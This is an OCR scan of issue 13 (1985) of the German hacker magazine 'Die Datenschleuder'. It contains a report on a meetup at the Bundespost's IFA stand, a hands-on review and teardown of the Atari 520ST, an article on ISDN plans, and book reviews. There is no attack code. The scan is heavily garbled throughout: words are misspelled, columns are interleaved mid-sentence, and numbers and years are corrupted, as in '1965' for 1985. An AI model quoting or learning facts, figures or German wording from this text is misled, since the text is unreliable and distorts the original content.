kerparly. 

Die Meldung rrvachte schnell die Runde, dabei 
war die Papierverteilung effektiver als die Btx- 
Arkündigung. Es fander> sich gut 100 Leute ein. 
die alte irgendwas hören und sehen wollten. 
Harniirger, Bayern und Berliner bemühten sich 
gemeinsam Die vier Seiten der IFA- 
Sonderausgabe wurde eifrig verteilt, sie liegen 
für all diejenigen, die keine Chance nahen, m 
Berlin zu rechten Zeit am rechten Ort zu sein 
dieser ds bei. 

Wir brachten wie angekündigt Faßbrause mit, 
nicht etwa urn die Mäuler zu verkleben, sondern 
um die Stimmung gleich von Antanq an zu 
heben, und um den Schwarzen Schlingel damit 
zu bewirten, doch dazu sollte es nicht kommen 
Wie von der Post geplant begann besagter kurz 
nach 15 Uhr mit dem Verteilen von Preisen- 
eines Wettbewerbes Nachdem er die Bühne 
beirefen halte, wurde er etwa eine Minute lang 
vom Publikum weiches nicht allzu groß war. 
ausgepfiffen und gebuht. Was ihn aber nicht 
weitet zu stören schien als selbsternannter 
Buhmann der Nation". Gegen 1$ Uhr begaber 
Sich von der Buhne auf eine Empore zwecks 
des besseren Überblicks über die emtrudelnden 
User mit atypischem Benulzerverhaiien" und 
das fing an. was erst knapp zwo! Stunden später 
enden sollte. 

Im Freien war es. wie im ds-Extrablatt angekün- 
digt. grau und zudem feucht. Freundlicherweise 
stellte uns die Poststandleitung den Persona- 
laufenthaltsraum zur Kommunikation zur Verfü¬ 
gung Hierfür sei nochmals gedankt, wir naben 
uns wohl gelühli Wegen der Enge war trotz 
stickiger Luft ein “tn Ohnmacht lallen" unmög¬ 
lich ^hon das Durchreichen von Pappbechern 
ward zum Problem 

Das ganze war etwa so wie ein Famiheniretfen. 
SO eng. so laut, so fröhlich. Man traf Leute, die 
man sonst nur via Chat oder mail kannte und 
knupfie neue Kontakte zu Leuten, die man noch 
nicht kannte und es war Gelegenheit, einige 
falsche Berührungsängste zur Post abzubauen. 
Es endete damit, daß man sich die Lasershow 
der 08P ansah, was man sich hatte schenken 
können Die Grafiken waren zwar teilweise ganz 
brauchbar Ein Qrundproblem der Post Die 
Technik klappt, aber die Kombination von For¬ 
men Farben u-^d Musik war künstlerisch wert¬ 
los 

Fazit; Ein gelungener Nachmittag, auch wenn 
die Erwartung einiger Gaste, die auf einen 
Vortrag hofttea enttäuscht wurde 
Statidessen gab es eine unüberschaubare Men¬ 
ge kleiner Gesprächsgruppen, was aber voll 
und ganz durch die vielen neuen Kontakte 
aufgewogen wurde 111 

0OSlan13 WS 850929 2303 


Inflation 

aus: CoEvoultion Ouarterly 30/1981 


D-e Samstagausgabe der Well ist immer besonders luslig Zwar heiOi der V/irlscfwtlsieii jetzt mehr mehr -Well der 
Wirtschaft und Fe'nsehen sondern nur noch Well der Wirischafl' . aber unter 'Geistige Well" hndet sich Als der 
Dudeisacli noch als AngnifstvaMe galt Auf der 'Wiascnschatt --Seite cm Betrag' Horchgerät für faule FrucNie- MikfoTone 
regisirieren FreOgerausche von Insexien Ais Aufmacher aut der Wissenschahssetie die moniere Frage nach Paßkon- 
iroiie am KrarxenbetP . Die Unierzene beqinni mi| Mediziner fordern, . 

□■e Sd'ie Zwei ö'ockf Ojc EniwcKiung zur G echberechfigung mii emem neues Scfiimpfwort lors Lesevo* Oie 
Oucienfrauen kom.T.en- Und Geißler dessen Ruckint; den Frauenanteil m der Regierung um W** eihohie. ergre,fl 
umer - Wcilnachftchien - Partei für dic nicni gie-chberechfigien Ehemänner 'Die famitie isl für uns der withiigsie Orl 
der Gleichberechtigyng- und fordert - Euiehunosgeid für Vater 

Eine Untersuchung im Kindergarten zeigte daß Durchsetzungsvermogen dann besieht, anderen bei unwichiigen Dingen 
nach dem Maui zu reden und bei wichtigen iiuf Eigenmleressen zu vertreten Geißler hat zumindest das begr.lten. 
Auf der 24 findet sich em "Kiemes Welithealer" und nicht die Witzseile. Aufmacher: Unser winziger Postmimster mit 
Riesenkopf s<tzt im Fischkutter und langt fernsehgeile Fische im Kabelnetz. Oie NeUoffnung ist bildschirmldrnrxg. CSS 
dreht an der KaCelnelzlrommel. 

Wie in einigen anderen Samstagzeitungen außer der taz findet sich eme Anzeige für EPSON-Orucker, Es wurde noch 
I hingenommen, wenn sie einen ' Volksdrucker liefern würden Aber sie denken eher an Rolfs Royce, dert sie großer 
abbilden afs ihre kleinen Drucker. Daneben ein Mietangebot: 50 DM/Woche für enen LO 1500. Das isi kern anderes 
Holz-Reisemob'l- sondern ein Drucker. "Ox emen Tag im Rolfs Royce mi( Chauffeur zu gewinnen' links daneben die 
Vefheißi/ng, Selber lanren verboten. Der RR hat das Kennzeichen D-FX 105 und isi von Al/TO-Becher In der 'AUTO-WELT" 
reklamiert etliche Seifen weiter unter dem Artikel 'Freier Himmef auiomalisch' Auto-6ecker. das 'mieressaitteste 
Autohaus der 'Well'. Neben einem vom vielen Nachdrucken matten RR-Logo gibts ein zehn Jahre gereihes Modell 
fKifomeiersfand genau €B 256 km) für genau 169950 DM Afs Erfschädigung rn der 'Geistigen Welf' Peter Glaser 'Guten 
Tag. ich bin Lucy'. Eme Eriahiung. von der zu Mfen isf. daß sie wenigstens em paar Weil-Schreiber begreifen. 

Peter beschreibt, was passiert, wenn dm Weit, die er als Autor schafft, ihn zuhause besucht wel(«tef3 ws 933929 




Hilferuf 

ap Newent - Der Engländer 
Frederick Cooper (07) in Newent 
wußte, was zu tun war. als er irtit 
einer Schere in einer Baumkro¬ 
ne saß und die Leiter plötzlich 
umfiel. Er zog sein schnurloses 
Telefon aus der Tasche und rief 
die Feuerwehr an. Dort hielt 
man seinen Anruf für einen 
Scherz. Eine halbe Stunde spä¬ 
ter rief der Mann die Polizei an, 
die zwei Beamte schickte. „Ich 
war in meiner Jugend Pfadfin¬ 
der“. sagte Cooper zu ihnen. 


enoiw ziwoiul uoy e"iiltVT9V9 


everylhing you do is right 


520 DatensalTOS 

Experimente mit einem zukünftigen Computer 



Keine Frage, der 520er ist die nächste Hackennaschlrte. Von den Wenns und Abers hier etn erster Bericht. 

Seil kurzer Zeit wird ift Hamburg der dofl erste 520ST Rechenreit zur FUSED-PAL-Anatyse braucht. Gesetz und ist der Projektname tur ein Network 

in einem großen Kaulhaus von fachunkundigem Per- Der TV-Modutator wurde eingespart. Zu Recht, denn Dnented Minimal Operation System . das m ein 520er 

sonal bewacht. Füttern verboten. wenn schon ein C&4mit Fernseher ein flaues Bild gibt, Eitersion-Rom kommen soll. Ins Rom kommt auch die 

FreufWe diebereitseinenhaben, berichten, daß das kannman640'4COPixeiautBiiligmoniforenveigessen. User- bzw. Geratekermung nach Amateurfunknorm 
milgelieferte Kermil eine leicht "negative Versions- Angenehm ist die Maus Das ist eine Art Steuerpult Nichf-Amateure und Geräte kriegen nicht zugeleilte 

nummer" hätte Und da» Betriebsaysiem ist das ROM für eine Hand. Man legt die Hand drauf und kann auf Rufzeichen, damit das System aulwartskompatibel ist. 


nummer" hätte Und da» Betriebsaysiem ist das ROM 
noch mehl wert in das es gebrannt werden müßte und 
vwrd aul Floppy geltetert Ein ROM-Update ist lür 
irgendwann und 150 DM angekündigt 
Trotzdem interessierte rrach der 520er so. daß ich ein 
oaden-wurttembergisches Klemstadtchen besuchte: 
Dort konnte ich bei ein^ Art Computer-aul-derrv 
Bauernhof-Shop einen gleich mitnehmen 
Er sei komplett getestet" versicherte man uns, bevor 
wir mit drei Kartons nach unerquicklichen Preisver- 
handlungcn verschwanden 

Nach dem Auspackm ergaben sich Berge von Kabeln 
und diverse graue und schwarze Kästchen 
Oip Tastatur erweckt einen guten Eindruck. Oie zehn 
schrägen Funktionstasten sehen schick aus Aber hall 
mal beroe Hände nebenemarxier vor dich in die Luft, 
acht Finger parallel die um 4S Grad aüMewinkelten 
Daumen berühren sich und bilden mit den Zeigefingern 
emgroflesw Du kannst Oieseswi-ursiv steilen, indem 
Du den Winkel links für F1-F5 verminderst (geht be- 


dem Tisch rumrollen und gel^entlicfi auf ein oder 
zwei Kröpfchen drücken. Attrakiiv und praktisch Soft¬ 
ware zum Erstellen von Leiierplanen wäre bei 640'4CO 
Pünktchen (guter Bildschirm) erwünscht, wird aber 
noch aul sich warten lassen. 

Die Bauart der Maus (aufschraubbar) ist einfach und 
gut. Eine schwere Kugel rollt leicht über den Tisch 
und treibt zwei Licnimünien mit je 20 Flügeln (Vorsicht 
bei der Demontage - nichts abbrecheni!'). Dia Flügel 
unterbrechen die je zwei LED-Strahlen je nach Beweg¬ 
ungsricht ung. 

Auf der Lötseite der Platine sind Minibauelemente 
aufgeschwemmt: das größte ist ein I4pin IC. platt und 
rasterfTiaßig gegenüber der bisherigen Normalform 
um den Faktor 2.54 geschrumpft. 

Leider blieb auch hier Atari ein Kabelkrämer ideal 
wäre die Infrarotmaus, die selbständig zum Batterie 
auiiaoen fahrt, wenn sie nicht gebraucht wird 
Ok mag man auf den Luxus noch verzichten, so ist 


Eine IfTiplemenlation Oes AX-25-Protoko|is (Dalex- 
ahnlich) über die WIDI-Ports soll 520e' üniereinarder 
vernetzen, aber es soll auch ube- die V?4 gehen. Das 
Wird ncch dauern Unsere Zieivfz'stellung Umbau des 
5tOer zur Tetefonmaschine (AniutDeantworter mit 
Sprachsjteicherung auf Harrtditk Synthi. Mailboxum- 
Schaltung mit automatische- Normumschallung |e 
nach Datenträger und automatische Umschauung auf 
Fernkopierersende-und -emplangsbetneb - alles m 
einem Gerat) und das alles als Multiusersyslem mit 
vernetzten Ataris oder anderen Rechnenv die das 
AX25-Prolokoll fressen afacha13 ws 850930 0123 


Quem) und rechts tut die entsprechende Winkclerho- die Spar-Dokumentation eine Unverschämtheit 




huny in der Harxdwurzel weh Das ist die für Tasten 
F6-10 eriOfOerliche Handhaltung. 

Milten im Kabelwerk standen zwei schwarze Kästen 
Es waren elektrische Kleinkrattweike Typ 'sofort weg- 


Daß die wenigen Ouadratmeter englisch geliefert wer¬ 
den. mag noch angehen Jedes BiMigteiefon mit einer 
"DRUCKEN IN HONGKONG'.Anleitung ist besser do¬ 
kumentiert als der 520er. auch wenn dort "freigestellte 


werten, wenn Netzkab^ kaputt Atan lormuiieri ge- Singweisengntler autiauchen oder • peim Tanoyteo „„ö Danxe. JKk' 


^ ^er BASTARD-Blitz 

Lnabhangice Clubzeitschnft öes Bundes flei Alan-ST An¬ 
wender" nenm sich em neues Biatichen das es C'atis zum 
SdP*'eab Actija. lirmenreuiral' darf n.nhi veiges&en wniann 


fälliger 'Die Netzleiiung dieses Gerätes kann nicht 


ersetzt werden Bei Beschädigung der Leitung Gei-al umrandet" übersetzt wird 


the digits are rounded mit "Die Ziffern werden Tiieiacite des Maehwerks m Oaia Becker Naenwuei squaiilai 


nicht weiter verwenden ‘ 

Diese schwarzen Kasten waieneiniacrt zu undboien 
dem Neugier-gen kaum Einblick wegen des Siche- 
lungskonzepis "Kleben sian Schrauben Da ist man 
angeschrmert 

Em Kleinkraftwerk hängt an Tastatur mul Rechner 
ikabdlose Handhabung wie m den Anzeigen prima 
Mil der Tastatur aut dem Senoß geht das Monitorkabei 
leicht raus und die Kiste resettet) em Kleinkraftwerk 
an der Floppy Nur der Bildschirm bekam Kein schwar¬ 
zes Kleinkraftwerk mit Watn-Aufschrift Das Netzkabe' 
■si auch besser und vermutlich auswechselbar 


Das Auspacken und die erste Ihbetnebnahme ist aul 
Pin paar Seilen KunsidrucVpapier halbwegs verständ¬ 
lich beschlieben 

Dann gibts noch 72 Seiten LOGÖ-Kram. im Anhang ist 
wenigstens der Zeichensalz bekchnepen. Auf Frager 
nach Escaoe-Steuersequenzen oder der Ansieuerung 
der Mausschnittstelle gibts keine Auskunft. 
Statidessen gibts Firmenpotitik. Für etwa 1500 DM 
bekommt man ein paar tausend Seiten Doku und 
einige Floppies Kurz. Nach Erwerb der Hardware 
gibts für den Pieis eines halber Rechners die zum 
Betreiben notwendige Doku und Software. 


Oie minimale SysiemauTJenverkabeiung betragt rund Trotzderri laßt die Sysiemdoku vieles offen. Es mag ja 


i0 Meier •$! aber haipwegs narrensicher Nu' bei Oer 
Floppy gioi es em Problem Am Rechner eine Buchse 
inn DIN Haibschwergewichi mit der Aufschrift "Floppy 
Disc an der Floppy zwei Oie eine heißt IN" und die 
arxJete OUT" Das ist das klassische Bedienungsan- 
leilungsdilemma Man kannaucheinen Kipplichtschal- 
tei oben mil OBEN und unten mit UNTEN beschriften 
Das Vettxndungskabel zur Floppy isl produKilonslech- 
nisch aus dem Kernspeicher-Zeilalter Damals wurden 
durch winzige magnetische Kerne je drei haardünne 
Drahte von Hand geladelt Heute müssen wohl bei 
Atari Floppykabel von Hand gelotet werden Vielleicht 
ist das em Grund für die Lieterverzogerungen 


angehen, caß das tückisch« OBeraling System (TOS) 
noch nicht ganz ivmMioniert. aber teioei wird nicht 
recht deutlich, wie es eigentlich tunkimnieren soll 
wenn es fertig ist. Vermutlich itt das noch unklar 
Das Ding lauft toll, nur sind die Maröwaretestprogram- 
me nicht rechtzeitig fertig geworden Am besten, wir 
User schreiben unsere eigener' Die Lieferbedingun¬ 
gen vom "Händler-Informaltonslag 20 Mai'85' schrei¬ 
ben in "Anlage 5": 

Als Auslallobergrenze lür (einen Sonderrabatt von 
2%. ds-Red.) .. werden 27®/. vereinban, danach 
tauscht ATARI defekte Gerate aus Verständlich aus- 
gedruckt ATARI behalt es sich vor an Händler bis zu 


Die angeblich Unabhängige Clubzeitschrift BASTA 27'!'o Schrott ohne Rücknahme oder Entschädigung zu 

BLITZ von erlahrencn DATA BECKER fachauioren liefern urfl gewährt dafür ZV» Extraraban 

beschuldigt die Post sie sei schuld an den Lieferver- Das haut jeden gm oder ergibt wie Alan formuliert 

zogerungen wegen der FTZ-Nummer,. Hier muß die eine hohe Umschlaggeschwindigkeil 
Post in Schulz genommw werden denn Irotz erteilter Zur Unterstützung des Abverkaufs' bietet Atari einen 

Nummer gibts nicht genügend 520er im Handel. Maiernoienst (Papptatein mit negativer Prägung eines 

Das Zerlegen von Tastatur und Rechner war Fummel- Schriftsatzes der Duden) uivJ Nationale Werbung 
kram da alles blechmaßig abgeschirmt, verschraubt. Unter Atan-Präsentation findet sich der Punkt Ver- 
verklemml und verlötet war Auch hter hat Atari noch Stärkung aes Images": darunter ein LKW-Oidie mit 
nicht das rechte ProduWionsknowhow: Snap-In- Atari-Werbung Mehr spater, nicht heute 
Gehäuse sind besser und billiger, setzen aber gutes Igt dOCh LOGO^ 

Oesign und entsprechende Testverfahren voraus. 

Oer Videoteil (320424 MHz) im Rechner ist abge- Wie bei Behörden. Alles Ausl^ungssacne 

«ie e.n HF-Teil m Fernseher Äul der Unler- Das mlgelieferle Logt) isl vom BeMlsumlanj dürftig 
sede der Plat™ IRev. Bl ein Sonoer-R Igb-.i-so-gd- und reagiert aut 5 mit 21.^ Null hoch r, 

swi oben ein nachtraglicbei R INull Ohml kein CulS- gel" “^«fsI, ala52013 ws 850929 1937 
Jumper Vier ROM-Socket ZU je 32 KB sind noch frei. . 

zwe<sindmiie4K88ootsufigt;rülll Das ist der wahre ChaOS-Plane mit dam S 

Grund warumdie 128KB-Version nicht auf den Markt CCC-CH wuselt an einer Mailbox ii 


mjÄisctiBn xiappl die Kooveruerijnig fu>n FoiQM'.f nalbweg» 
nur Uriiscridg und die Kopüeiien »iier Serien werden ini «mem 
MjiiixOfucke* aemaent 

Aiel Fl und 'Woitgang Sen nanen SueH ftoen zwei mit der 
Zeiiscrihn Das redaktionelle Konzeoi ertoroen zafticnde piau- 
b>9e Veremsmilglieder 'Alle 6A5tA Miigneder erriaiten die 
7eiisr.nrili kneienlos" siehl im impiessunk Mas die Mitglied' 
small koslei. steN woanders 

Pie Puaiiial der ZeitseririH enispnchi der Aian-Werbung Schon 
a^l der Tiielseite eine Hardwarekonipoeiiion die twar lotogen 
i»l, aber kein lunMionierendei Ardeiispialz 
Die abgecrucxien Texie kennen keine Onaoe 
ünier dl Maiibox sient gesenrleben Die Maiibox soii naiuriicn 
ai.1 einem ST lauten An dem Konteot arbeiten wir noch, dazu 
verraten wir n«h nichts Es wird aber etwas anders aussehen 
aal das der bisher üblichen Ua iboien uaßieuch überraschen' 
Acht Selen weitei 'Wer kann eme Ma>ibOi icnreioenl 
So sehnen v»ie möglich «oHen wr die Ua<ibo> m Sel'ivb 
nthrnen. doch woner rch-nen unfl mehl stcmcn® 

Eine m 6 geschneoene Ma I9C« aul dem Atan «aie schon eine 
lene Sacne Sicher tafti sic"i em solches Programm kucli 
kcmmerzieii verwerien Also wer CD'erl sicn’' 

Sooo flarl rran das aber nicht lormui'eien Das hat euch Papa 
Ciatker wohl noch nichi Deigeorachi' Aper weiter pei der 
Maiihox-Solt Für den Arilang leich! abe- auch pin PioqramrTi 
lui (len C64 c3d©r den Schneider CPC 

Unter soienen umslanden «unde'l es nicnt. «senn Accounts 
dl« tur Data Becker gedacht smd nicni mal von ejeren Milar 
öeiiern sondern ausschliefti cri von Macke'r> genutzt wenden 
sei der Beschreibung des Floppy Disx Anschlusses kommt eine 
aktuelle Bescrireipung zürn "moe* PuI'S« Hierüber lau'en oie 
iniiiai'Sierunqspuise der Lauhwerkseiektramk im aktiven Zu¬ 
stand fuhrt dieser Pegel TTL Pege ung smo AK Tiv LOW intern 
«vrU ei Ouicn eir-nn 1 hohm Puh-uo-Widerstanc rhach 5V 
hochge legt 

Das ist -vin aber kem Wuneci br;' C64 JnBin di« vor Besch.n1. 


u lästern Aber noch gemeiner isi es eigenes 
n linier der Überschritt Erterne Hardware 


Chaos-Pläne mit dem 520er 


kam Das RAM wäre schon mil dem Betriebssystem 
üborfülll gewesen. Denn FloppyTOS umfaßl mehr als 


Bayern fluchen übers nicht laufende Kermit. Die Ber¬ 
liner machen irgendwas uns unklares- Die Harnove- 


200 KB und die passen nicht in 1Z8 KB Was in TOS raner wollten noch .Floppies vorbeischicken Es gibt « 

drin ist. bfeibl unklar. Erste Untersuchungen erwecken Beschaffungsprobleme: Wer hat eine Bezugsquelle für *2 

den Anschein. Jack sei leibhaftig in digitalisierter Form Floppy-Glgadinsiecker? Oanir lassen sich für 500 C ^ 


drin Er fflud noch ausgetrieDen werden; OS statt TOS. 
Oie ffi ^icher-lCs (je 2S€KBit) sind großzügig auf 


ÖM dop(^5eitige Vobislloppies anschließen In Ham- 


I Floppy-Tests. Man kann die 


der Platiiie verteilt und bieten Platz für ein überschau- TÖ^Flopp)/ in einen Aricot reinsiecken. Zwar läßt sie 


ln Ham- 3 ^ 3 ^ i- äi 
Original Tu ^ § p « 


bates Redesign. Gesockelt sind nur die ROMs. der 
66190t und der DUA-Harddiskhonlroller sowie die 


sich nichi direkt f logisch'} lesen, aber 'physikälisch 
das Aufzeichnungstormat wird geschlickt und die 


beiden Custom-ICJs in lmn>Afenasockeln.Siesindder Directory-Einträge sind zu finden. Dabei ergab sich, 
gegenwärtige Kopierschutz. Soffware. auch flOMs., daß (u.a.) KERMfT vorher drauf war und dann als 
lassen sk^ ganz leicht kbpieren. Hardware auch das gelöscht markiert wurde. Jedes an mich ausgelieferte 
zeigen die App/e* und IBM-Nachbauten. PALs erfor* gjt gehört mir. oder??? 

j3erfh.etwas mehr Mühe, aber die lassen sich per Weilers Fftäne werden gerne verraten, da sie am 

^^ftSi rg~7»hityäleren. tMbef^Tst^luöh. egal. -Ob das ah«<|«n gemainuim verwirklicht werden. 


Je «'SixioS 

S J!ħf 



(c) datenschleuder 13 ‘ Oktober 1985 * C9927F * Seite 3 





Was sind Ihre mickrigen 64 Kilobytes Speicherplatz gegen die Millionen^)0^^ 
^von Bäumen in unserem Urwald oder die Milliarden von Grashalmen 
v _ auf unseren Savannen! _ 


e Milliarden von ! 

^ 4r ^t 





Post Future? 


Im orbitalen Umlauf befinden sich auf geostationärer Bahn M Satelliten des 
Inteilsatsystems. mit insgesamt 153000 felelon-urKi 24 Fernsehkanälen. Durch 
Satelliten können jeweils 12000 Telefongespräche gleichzeitig übertragen werden 
Global gibt es über: SSO mio. Telefonanschlüsse. 1.5 mio. Fernschreiber. 6 mio. 
Terminals und rund 1 mio. kommunikatlonsfähige PC's Mehr als 24 mio. Fern- 
Sprechhauptanschlüsse entfallen allein aid das Fernsprechnetz der D6P Oie 
Telekommunikatiorsdienste der DBP bestehen heute aus getrennten Fernmelde¬ 
netzen. wie das herkömmliche Fernsprechnetz mit ca. 30 mio. Telefonen, das 
Integrierte Text* und Datennetz in digitaler Technik |IDN) swie die lokalen Breit¬ 
bandverteilnetze für die Übertragung von Ton-und Fernsehprogrammen. Als vor 7 
Jahren die Grundsatzentscheidung der DBP fiel, ihr total veraltetes Fernmeldenetz 
zu digitalisieren, und die einzelnen Neize zu integrieren, war das herkömmliche 
Fernsprechnetz Minelpunkt ihrer Überlegungen. Denn es bringt die wichtigsten 
Voraussetzungen eirrer Netzintegration von vornherein mit: es ist das flächenmassig 
am dichtesten ausgebaute Netz, es hat bei weitem die grösste Teilnehmerzahl, es 
dient der geschäftlichen wie der privaten Kommunikation, seine technischen 
Einrichtungen sind vergleichsweise preiswert, es ist weitgehend international 
slartdardisiert. Oie Grenzen des Fernsprechnetzes liegen jedoch in seiner einge¬ 
schränkten Ubertragungskapazilät und -quaiität. Oie Teifnehmeranschlüss« des 
Fersprechnetzes und des Integrierten Text und Datennetzes bestehen ausschliess¬ 
lich aus Kupferkabel, dessen nieder« Leistungsniveau ment die Ansprüche van 
Morgen gewährleisten Seit 19S2 ist die 06P nun dabei, die Übertragungssysteme 
des regionalen Fernverkehrs zu digitalisieren. Nach Angaben der OBP wird der 
Oighaifsierungsgrad 1965 einen Wert von 20% der geschalteten Leitungen nicht 
überschreiten. Die Digitalisierung der übertragungssysteme der überregionalen 
Verbindungen werden aller Voraussicht 1990 die 50% Klausel erraffen, erst 10 
Jahre später im Jahr 2000 hofft man, die 1M% Oigilalisierung hinter sich zu 
bringen. Oer vollständige Ausbau des Fernsprechnetzes in digitaler Technik wird 
voraussichtlich im Jahre 2020 abgeschlossen werden. Da schon im Normalfall bei 
ner OBP alles länger dauert, wird im Ernstfall ein DgitaMsierungaende nicht vor 
dem Jahre ^150 zu erwarten sein, was sehr starken Zweitel an demgaruen Projekt 
aufkommen lässt. Die Gründe liegen laut DBP in den enormen InrKwations- und 
invesiltionsansprüchen dieses ProjeMes. denn allein dos Auswechsetn der rund 
6700 Vermiflfungssfeffen des Fernsprechnetzes mit den Mniionen von Leitungen 
erfordert Jahrzehnte und Inveslilionen in Milliardenhohe. Oie Vermittlungsstelten 
oesitzen für sich allein einen Wiederbeschaffungswert von ca. 40 Mrd. OM-West. 
Nach Fertigstellung dieses neuen Fernmeldeneues trägt es den stolzen Namen: 
ISDN'. Was für den inlerriational standardisierten Begriff: Iniegrated Services 
Digital Network steht. Ziel dieses Schaffens stellt der iSOf^Gasisanschluss dar. bei 
dem Uber die herkömmliche Kupterdoppelader der Teiinehmeranschlussleitung in 
digitaler Form zwei Nutzkanäle mit je einer Bitrate von 64 kbit/s sowie ein 
zusätzlicher Steuerkanal mit 16 kbit/s übermitl^t werden können. Besortderes 
Merkmal des ISDN ist. die seit langem erwartete, genormte Teilnehmerschnmstelle. 
bezeichnet als " Oie Universalsteckdose "... Was bietet uns. dann Verstorbenen, 
das ISON-Projekt? Im ISON-Fernsprechen wird eine bessere Sprachübertragung 
gegenüber dem heutigen Fernsprechen garantiert. Beim ISON-Teletex können über 
64 kbit/s eine OIN-A4-Seite in weniger als 1 Sekunde statt bisher 3 Sekunden 
übertragen werden. Wenn im Jahre 20” BTX noch vorhanden sein sollte, sind die 
Benutzer in der Lage über ISDN-Biidschirmp«t schnellere Bildaufbauzeiten zu 
genießen. Laut DBP wird es jedoch an dem unüberwindbaren Anpassungsaufwand 
m den Sildschirmtextvermittlungsstellen scheitern. Die tSDN-BildübermiRlung er¬ 
wirkt elwa alle 4 Sekunden ein neues Standbild. Beweglbilder sind im ISDN natürlich 
nicht möglich. Aber was kümmert uns. dann in den ewigen Jagdgründen der 
Daterwvelt. verstorbenen Hackern und Datentouristen der ganze tSDN-Alptraum? 
Was bleibt ist jedenfalls nur die neue Datex-L Verbindung in die USA. die der Gilb 
in Zusammenarbeit mit der amerikanischen FernmeidegeseiischaR TRT Teleconv 
municaiions Corporation und der Firma Nixdorf Computer AG errichtete. Die 2400 
Dit/s Oalex-L Verbindung wurde auf der Hannover-k^sse 1965 eröffnet 
created Dy Ooeiix. 

Das Redaktionsteam erhielt zum Redaktionsschluß diesen Beitrag Er ist die 
Überarbeitung eines älteren Entwurfs für die d$ 11/12, der aber nicht abgedruckt 
wurde. Wir bitten um Zuschriften, die wir an den Autoren Weiterleiten 
ct isdnobtS.ws 850929 2200 


Heyne HalbschnellschuO 

Ein amüsantes, aber fachlich unkorrigiertes Bach stanvnl vom Heyrte-Verlag. 
Richtig geklappt hat merkwürdigerweise die Datenübertragung eines Maiibox- 
verzeichnisses im Arvhang ausgerechnet von der Telebox. so firtd^ sich 
unier "Mailboxen in Deutschland" unter dem Eintrag Chaos Computer Club 
eine privale Telefonnummer mit dem korrekten Vermerk "Keine Mailbox!'. 
Jetztrist sie nicht mehr privat und Nummer der Btx-Redaktion (Notlösung) 
Hanen andere Leute ähnliche Probleme? 

Beim Lesen finden sich ein paar witzige Personenbeschreibungen, die in 
einigen Punkten etwas verwischt sind. Dazu kommt eine Sammlurtg vieler 
Hackerstohes. Lästig ist der Personenkult. Bn Oatenschleuder-Leser schreibt 
dazu nach einem Vorspann zum Bezugsproblem daienschleuder: 

OM (Leider dürfen wir hier den richtigen Preis nicht schreiben, da das sorrst 
Werbung wäre. Red ds) gekauft. 

Und drin handelt das Ding last nur von Wauibaby. Ist es etwa das? Verschlingt 
die Pflege des Personenkults alle Zeit und alles Geld? Oie beiden Autoren 
vergaßen zu erwähnen, was man zum Frühstück essen muß. damit man ein 
weltberühmter Hacker wird (Falsch. Auf Seite 10 steht '...BuK« lila färben 
kann.* Die Autoren besuchten Wau. als er Brötchen mit iiia Butter ur>d Honig 
Irühstückte. Red. ds] 

Nun gut. Will ich mich langsam wieder abregen. Was wir aber nicht übersehen 
wollen jst. daß ich seit der Einladung zum Congress keine ds mehr bekommen 
habe. Über den Congress habe ich tatsächlich erst wieder was in diesem 
bescheuerten Buch gelesen 

Ich wäre euch danktor, wenn ihr meinen Srielkasten. bzw. den Briefkasten 
meiner Freundin, demnächst reichlich mit guter Literatur laien wüidet. (Wir 
mühen uns redlich. Anm. ds) 

Schickt mir fa nicht dieses besemmelte Buch, das ich feider schon habe! 
(Versuch es bei Heyne mit einem Garantie-Umtausch. Anm. ds] Gruß. Frank 
(Wär nett, wenn Du die Hackerbibel rezensierst. Deine Art gefällt. Besuch ur« 
mal. Anm. ds) 

Militäreinsatz gegen Hacker 

'Wenn es «in Phänomen wie das absolut Bose überhaupt gibt, dann besteht 
es darin, emen Menschen wie «in Ding zu behandeln.' (John Brunner) 
und doch tun sie es. diese Perfekiionisten. diese entsetzlich tüchtigen Leute, 
die mit ihren praz'Se funktionierenden Fischgehirnen Menschen auf SiOckgut. 
auf Menschenmatenat. auf Zahlenkombinationen reduzieren, um sie io den 
Gritf zu bekommen, um sie als numerische Größen in ihren Kalkülen hand* 
haben zu können Wie winzig der Schritt von diesem Denken zum Handeln 
ist. Ist Alltag, ^ispiel: Für einen Atomstaai Ist es Kleinkram, ein Schiff von 
Greenpeace zu sprengen und dabei einen Fot^ralen zu ermorden. Das gibt 
einen Ministerrücktritt. und diejeniggen, die die Presse inforrrtierten werden 
bestraft und nicht belohnt. 

Noch verfügt kein Land der Welt über den elektronischen Perfektionismus, 
wie ihn Brunner im 'Schockwellenreiter* beschreibt. Aber die Zimmermänner 
aller Länder bauen daran und wollen, daß wir - angeblich zu unserer 
Sicherheit - im Datennetz zappeln 

Dann bedarf es nur einer Regierung, die noch viel korrupter und skrupelloser 
als unsere ’sl und schrankenlos von diesem Immensen Machtmittel Gebrauch 
macht. 

Der Schockwellenreiter ist die Geschichte eines ComputerSabotageSpeziali- 
sten. der das Wissen der Militärs hat, aber nicht so b^heuert denkt wie 
diese und mit seinen Freunden elektronische Bandwürmer auf Regierungs- 
Computer losläßt, bis die Mächtigen per Militär an die 'Neutralisierung' gehen. 
Das ist keine Buchbesprechung, sondern ein Hinweis auf Pltichtlektüre. Heyr>e 
hat das Buch endlich neu aufgelegt (entgegen der MSG in der Kackerbibei). 

ISBN 3-453-30584-1. Heyne 0^3667, John Brunner. Der Schockwellenreiter. 
Auszuleihen bei jeder Ansammlung von CCCIern. 

Die Netzweber 

In der ds und der Hackerbibel wurde das Buch "NETWEAVING" erwähnt. Jetzt 
ist es aufgetauchl. es war verliehen. Es heißt NICHT 'Netweaving* sorvlem 
The Nefweever's Sourcehook. A Guide (o Miere Networking and Cemmunfea- 
tfonä und ist von Dean Gengle geschrieben, ln über tO Jahren ist Dean vom 
Sys-Op zum Network-Wizard geworden. Er hal das CommuniTree Netzwerk 
in San Francisco mit anderen zusammen entwickelt und eine Mertge Erfah¬ 
rungen gesammelt über die Auswirkungen des Informationszeitatters auf 
Kommunikation. Arbeit und Spiele, in The W efweever« SeurcMeek faßt er 
dieses Wissen zusammen. Es ist kein leichter, aber wichtiger Statt Stil. Inhalt 
und Konsequenz: gut. 

ISBN 0-201-0520&-3. Addison-Wesiey. 326 Seiten b:seite4 
Nachbemerkung: Da wir neuerdings den Vertrieb der ds aus Kostengrunden 
über PostvertriebsstücK machen, dürfen wir nicht die Preise der Bücher 
nennen, sonst würde es als Werbung gelten. 
buchbe13.ws 850930 0244 



Impreesum: datenschleuder 13, September 1985 - Das wisser»chaftliche FachblatI für Datenreisende - O 
erscheint achtmal imjahr aiie42(r)Tage - VerlegerundVisdHmbPG:HerwartHo[land-Moritz.5chwerKkesir. • 
